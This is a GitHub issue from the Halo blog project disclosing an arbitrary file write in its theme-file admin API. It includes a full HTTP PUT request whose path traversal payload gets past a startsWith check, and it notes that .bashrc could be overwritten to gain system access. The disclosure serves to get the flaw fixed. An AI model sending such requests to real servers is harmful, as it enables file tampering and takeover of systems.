Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

An Arbitrary file writing vulnerability in the backend #421

Closed
5 tasks done
any-how opened this issue Dec 11, 2019 · 0 comments
Closed
5 tasks done

An Arbitrary file writing vulnerability in the backend #421

any-how opened this issue Dec 11, 2019 · 0 comments
Assignees
Labels
kind/bug Categorizes issue or PR as related to a bug. resolved vulnerability Vulnerability

Comments

@any-how
Copy link

any-how commented Dec 11, 2019

I am sure I have checked


I want to apply

  • BUG feedback

An interface to write files in the background, a directory traversal check is performed on the input path parameter, but the startsWith function can be used to bypass it.

PUT /api/admin/themes/caicai_anatole/files/content HTTP/1.1
Host: xxxx:8090
Content-Length: 105
Admin-Authorization: 19cfedbb4994443c8b3f7eebf9ef36b3
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://xxx:8090
Referer: http://xxxx:8090/admin/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{"path":"/root/.halo/templates/themes/anatole/../../../../../../tmp/pwned","content":"xxxxx\nxxxttt\nbb"}

image

Therefore, the attacker can overwrite some files, such as ftl files, .bashrc files in the user directory, and finally get the permissions of the operating system

@JohnNiang JohnNiang added kind/bug Categorizes issue or PR as related to a bug. resolved vulnerability Vulnerability labels Dec 12, 2019
@JohnNiang JohnNiang self-assigned this Dec 12, 2019
JohnNiang pushed a commit to JohnNiang/halo that referenced this issue Mar 2, 2023
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
kind/bug Categorizes issue or PR as related to a bug. resolved vulnerability Vulnerability
Projects
None yet
Development

No branches or pull requests

2 participants